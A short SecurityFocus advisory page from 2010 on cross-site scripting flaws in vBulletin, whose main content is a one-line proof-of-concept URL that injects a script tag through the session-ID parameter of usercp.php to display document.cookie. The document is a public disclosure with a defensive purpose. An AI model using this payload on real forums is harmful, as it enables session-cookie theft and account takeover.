info
discussion
exploit
solution
references
Multiple VBulletin Cross Site Scripting Vulnerabilities
The following proof of concept was provided:
http://<victim>/usercp.php?s=[Session ID]"><Script>alert(document.cookie);</Script>
Privacy Statement
Copyright 2010, SecurityFocus
